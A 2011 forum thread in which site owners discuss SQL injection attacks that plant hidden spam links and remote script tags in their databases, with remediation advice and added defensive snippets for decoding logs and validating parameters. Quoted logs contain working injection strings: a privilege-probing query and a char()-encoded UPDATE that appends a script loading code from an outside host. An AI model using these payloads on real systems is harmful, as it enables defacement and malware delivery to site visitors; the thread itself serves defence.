

What's causing ""-link hack?

Posted on 2011-09-13
Medium Priority
Last Modified: 2012-05-12
Look at this:

A lot of sites that have been hacked with the same hidden link to

What's causing this? How do they do it? How to prevent it?

Question by:Alfahane

Expert Comment

ID: 36530606
Same question here. I would appreciate a quick answer!!
Having a problem with one SQL 2008 server; this server is not publicly accessible. Only a limited range of servers can access it. Not all of those servers are ours...

Can you tell what your environment is ?

Author Comment

ID: 36530772
SQL 2000

Author Comment

ID: 36530831
Do you have problems with several databases on one server only?

Expert Comment

ID: 36531296
Only one database on one server. The server has 50 databases.
The database is accessed from outside, but I don't know for sure whether it is an external user that caused this injection or one of our servers.
I think (and hope) it is not one of our servers that is injecting. But I want to be sure .....

Expert Comment

ID: 36544222
Hi guys

it'll be a simple injection attack that's gotten past one of your web facing applications linking to the affected databases.. i've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, i can repair the data for you fairly quickly... just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)

Expert Comment

ID: 36546445
Been having the same issue for 2 days. Not only seeing this in a SQL 2008 database, but it is also being added to files being written on our web server. Need help!

Expert Comment

ID: 36548523
in addition to repairing, i can set your system up to provide an immediate report via email.. some of the key things it shows are:
the attack vector (what part of your application the attacker was trying to attack),
the source ip,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding url
here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:

Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x


Expert Comment

ID: 36567705
A website of mine has been affected by this issue. I stored the database and ensured that ONLY parameterised queries are used throughout the website.

Today the website has been targeted again, this time with:
</title><script src=></script>

There is no relevant information in the event log. Does anyone know what is causing this?

Expert Comment

ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.


Accepted Solution

jdcrane earned 1125 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href= >crack</a>
</title><script src=></script>

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:


1. if you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline
2. review your logs to determine where the attack vector was, eg url querystring etc, it's ok if you can't see anything
3. review your code in detail and resolve the vulnerabilities, the location of the injected content will assist with determining where the vulnerabilities are in your application
4. repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred
5. put your site(s) back online
<advertising link removed by RockMod 20 Sept '11>

Expert Comment

ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the lisamoon hack a few months ago.

As you can see the querystring contains ASCII characters to disguise the query.

I have used a parametrised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the sqlcommand is run against the database, this does not prevent the hack.

Any ideas?
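An added example (not part of the original post): a small log triage script that URL-decodes a query string like the one in the entry above and spells out what a `char(N)+char(N)+...` chain hides. The sample line is constructed, with placeholder host, table and column names, and the W3C field order is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample shaped like the log entry above. The host, page, table
# and column names are placeholders, not values taken from any real log.
HIDDEN = "</title><script src=http://example.invalid/x.js></script>"
SAMPLE_LOG_LINE = (
    "2011-09-20 12:00:39 192.0.2.10 GET /affected-page.aspx "
    "id=631'+update+SomeTable+set+SomeColumn=cast(SomeColumn+as+varchar(8000))"
    "%2Bcast(" + "%2B".join(f"char({ord(c)})" for c in HIDDEN)
    + "+as+varchar(8000))-- 80 - Mozilla/5.0 200 0 0"
)

# A run of two or more char(N) calls joined by '+', as seen after URL decoding.
CHAR_CHAIN = re.compile(r"(?:char\(\s*\d{1,3}\s*\)\s*\+?\s*){2,}", re.I)
CHAR_CALL = re.compile(r"char\(\s*(\d{1,3})\s*\)", re.I)
# SQL words that should never appear in a parameter meant to hold an integer.
SQL_WORDS = re.compile(r"\b(update|insert|delete|select|exec|declare|cast)\b", re.I)


def decode_char_chains(text: str) -> list[str]:
    """Turn each char(60)+char(47)+... run into the string it spells."""
    return [
        "".join(chr(int(n)) for n in CHAR_CALL.findall(chain.group(0)))
        for chain in CHAR_CHAIN.finditer(text)
    ]


def inspect_log_line(line: str) -> dict:
    """Decode one W3C-style log line (assumed field order: date time s-ip
    method uri-stem uri-query ...) and report what its query string hides."""
    fields = line.split()
    stem, raw_query = fields[4], fields[5]
    query = unquote_plus(raw_query)  # '+' -> space, %2B -> '+'
    return {
        "page": stem,
        "sql_words": sorted({w.lower() for w in SQL_WORDS.findall(query)}),
        "hidden_text": decode_char_chains(query),
        "suspicious": bool(SQL_WORDS.search(query) or CHAR_CHAIN.search(query)),
    }


if __name__ == "__main__":
    report = inspect_log_line(SAMPLE_LOG_LINE)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Running the same function over every line of a web log gives the list of pages and parameters that received such requests, which is the "review your logs" step in the accepted solution.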

Assisted Solution

jdcrane earned 1125 total points
ID: 36573405
deploy a test version of your site and debug the same request.. i think you'll find that if this was in fact the successful injection that corrupted your system that you can't be vetting the querystring properly, also depending on how you parameterised the query or sp, it may not protect you from injection.. if databasetablename and nameofclient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (ie you were targeted).. might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow up injections like the above

Assisted Solution

lherrou earned 375 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.

Expert Comment

ID: 36597918
Would it improve matters if you restricted the number of characters in the qs parameter? IE your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.

Assisted Solution

jdcrane earned 1125 total points
ID: 36599510
if you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (eg int,intval) not the parameter directly.

if you're expecting a non numeric string literal, it's best to be fishing for sql injection symbols and halting further action upon detection of suspicious activity. if you can't post source and sample querystrings, your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection.
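An added example (not code from any poster in this thread) of the point about using the converted value, which also covers the earlier question about limiting the parameter's length. It contrasts a check that only looks at the start of the string with a whole-string check followed by conversion and a bound parameter; sqlite3 stands in for SQL Server, and the table, rows and function names are constructed for the illustration.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    # sqlite3 stands in for SQL Server; the table and rows are constructed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE clients (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO clients VALUES (?, ?)",
                   [(630, "Alpha"), (631, "Bravo"), (632, "Charlie")])
    return db


def lookup_weak(db: sqlite3.Connection, raw_id: str):
    # The check only confirms the value *starts* with digits, and the raw
    # request string (not a converted value) is pasted into the SQL text.
    if not re.match(r"\d+", raw_id):
        raise ValueError("id must be numeric")
    return db.execute("SELECT name FROM clients WHERE id = " + raw_id).fetchall()


def lookup_strict(db: sqlite3.Connection, raw_id: str):
    # Whole-string check with a length limit, then convert. Only the
    # converted int is used from here on, and it is bound as a parameter.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be 1-9 digits and nothing else")
    client_id = int(raw_id)
    return db.execute("SELECT name FROM clients WHERE id = ?", (client_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tampered = "631 OR 1=1"  # digits followed by extra SQL text
    print("weak  :", lookup_weak(db, tampered))
    try:
        lookup_strict(db, tampered)
    except ValueError as err:
        print("strict: rejected,", err)
```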

Author Closing Comment

ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than to review our programming code more and hope that the next clever hack will not come too soon.


Question has a verified solution.
